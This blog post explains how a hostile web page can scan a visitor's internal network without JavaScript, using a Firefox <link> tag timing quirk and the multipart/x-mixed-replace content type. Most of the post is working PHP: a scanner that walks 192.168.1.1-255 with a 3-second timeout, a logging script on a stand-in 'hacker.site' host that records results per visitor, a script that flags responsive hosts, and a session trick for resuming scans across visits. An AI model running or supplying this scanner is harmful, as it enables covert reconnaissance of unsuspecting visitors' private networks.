The concept of doing network scanning via JavaScript is hardly new, and it is quite easy for anyone with even a cursory knowledge of JavaScript. However, the assumption was that as long as you browse the web with JavaScript disabled, you are safe from hostile sites scanning your network. Alas, this was not to be: in a recent post, Jeremiah Grossman shows how this can be done with plain HTML, using no JavaScript whatsoever.
His methodology relies on a quirk in Firefox, whereby page loading waits for a <link> tag to be processed before rendering the rest of the page. This means you can use the link tag to reference local IPs and use a subsequent image to see how long the IP took to respond. If the response is very quick, then you know the host has something listening on the given port; if it is not, well, then the port is being blocked or filtered.
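To make this concrete, here is a rough sketch of the kind of markup involved (the IP address and tracking URL are placeholders of my own, not Jeremiah's exact code):
HTML:
<!-- Firefox stalls here until 192.168.1.1 answers or the connection times out -->
<link rel="stylesheet" type="text/css" href="http://192.168.1.1/" />
<!-- by the time this image is requested, the <link> above has been processed -->
<img src="http://hacker.site/scan.php?ip=192.168.1.1" />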
The problem with his approach is that scanning an entire network would be rather slow and would require multiple iframes, not to mention being very noticeable, so I decided to see if something could be done about this limitation.
The problem with scanning is that there is no way to set a timeout, so if you encounter a local IP that takes forever to reply, your scan is effectively stalled. Jeremiah tried to resolve this by adding a meta-refresh tag, but it seems Firefox chooses to ignore this tag while waiting for the <link> tag to load.
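For reference, the kind of tag he tried looks roughly like this (a generic example, not his exact markup):
HTML:
<meta http-equiv="refresh" content="3;url=http://hacker.site/next" />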
Fortunately, Firefox, Safari and Opera support a very interesting Content-Type called "multipart/x-mixed-replace".
(It does not work in IE6, but I'd be very curious to know whether IE7 supports it.)
This MIME type allows you to send segments of HTML, each of which represents a page of its own. Every time the browser gets a new segment it throws out the old one and renders the new content. This means that, using pure HTTP, you can replace the content of the page without any JavaScript, meta refreshes and so on, relying purely on server-side languages such as PHP.
PHP:
<?php
// each part of the multipart response is delimited by this boundary
$boundary = '----'.rand(1000, 9999).'----';
header('Content-Type: multipart/x-mixed-replace; boundary='.$boundary);

for ($i = 1; $i < 256; $i++) {
    // each segment replaces the previously rendered page in the browser;
    // note the blank line separating the part headers from the part body
    echo '
--'.$boundary.'
Content-Type: text/html; charset=utf-8

<p>testing ip <b>192.168.1.'.$i.'</b></p>
<link rel="stylesheet" type="text/css" href="http://192.168.1.'.$i.'/" />
<img src="http://hacker.site/scan.php?ip=192.168.1.'.$i.'&s='.time().'" />
';
    flush();  // force the segment out to the browser right away
    sleep(3); // our per-IP timeout before moving on
}
The above PHP code creates just such a payload, where each "page" prints a little progress indicator followed by a <link> tag pointing to a local IP address. We then have an image pointing to a monitoring script whose job it is to record the scanned IP and the time at which the scan was initiated. After this we call the flush() function, forcing PHP to send the accumulated data to the browser (if output buffering is enabled you may need ob_flush() as well), and wait for 3 seconds. The 3 seconds is our timeout; in tests on my network this value gave the best results, but a different value may work better for you.
This means we give our scanner roughly 3 seconds to scan an IP, after which, regardless of whether we got a response, we move on to the next address. The process is repeated until we run out of IPs or the user leaves the page.
Now on to the scan.php script, which is quite simple: it is just two statements long.
PHP:
<?php
// tie the results to this particular visitor
session_start();
// log line format: "scanned IP - scan start time - server arrival time"
file_put_contents(
    "/tmp/scan_".session_id().".txt",
    "{$_GET['ip']} - {$_GET['s']} {$_SERVER['REQUEST_TIME']}\n",
    FILE_APPEND|LOCK_EX
);
The first thing we do is call the session_start() function, which creates a new session for the user or resumes an existing one. The session id will become the unique identifier for the user, allowing us to keep scans from different users separate. The next line is a call to the file_put_contents() function (available as of PHP 5) that writes the result of the scan to a file. Each result line consists of the scanned IP, the time of the scan and the timestamp of when the request arrived at the server. As of PHP 5.1 you can use the $_SERVER['REQUEST_TIME'] variable for the latter; in earlier versions of PHP you will need to call the time() function. The function appends the line to the file, locking it in the process to avoid corruption in the event of multiple writers to the same file.
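The post stops at collecting the log, but interpreting it is just a delta calculation. As a hypothetical illustration (this report script and its 2 second threshold are my own, not part of the original), something like this would flag hosts that answered well inside the 3 second timeout:
PHP:
<?php
// hypothetical report script: reads lines of the form
// "192.168.1.5 - 1161234567 1161234568" written by scan.php
session_start();
$log = '/tmp/scan_'.session_id().'.txt';
foreach (file($log, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
    list($ip, , $started, $arrived) = explode(' ', $line);
    // a quick image request means the <link> resolved fast,
    // i.e. something on that IP accepted the connection
    if (($arrived - $started) < 2) {
        echo $ip." appears to have something listening\n";
    }
}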
Another trick would be to store the last scanned IP inside the session, so that when the user comes back to the site you can resume scanning at the last known position rather than starting from the very beginning, allowing you to scan the user's entire network over the course of a few visits.
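A minimal sketch of that idea, reusing the scanner loop from above (the 'next_ip' session key is my own invention, not part of the original scripts):
PHP:
<?php
// rough sketch of a resumable scanner
session_start();
$start = isset($_SESSION['next_ip']) ? $_SESSION['next_ip'] : 1;
session_write_close(); // release the session lock; scan.php uses the session too

for ($i = $start; $i < 256; $i++) {
    @session_start();              // briefly reopen to remember our position
    $_SESSION['next_ip'] = $i + 1; // resume here on the next visit
    session_write_close();

    // ... emit the multipart segment for 192.168.1.$i as before ...
    flush();
    sleep(3);
}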
Enjoy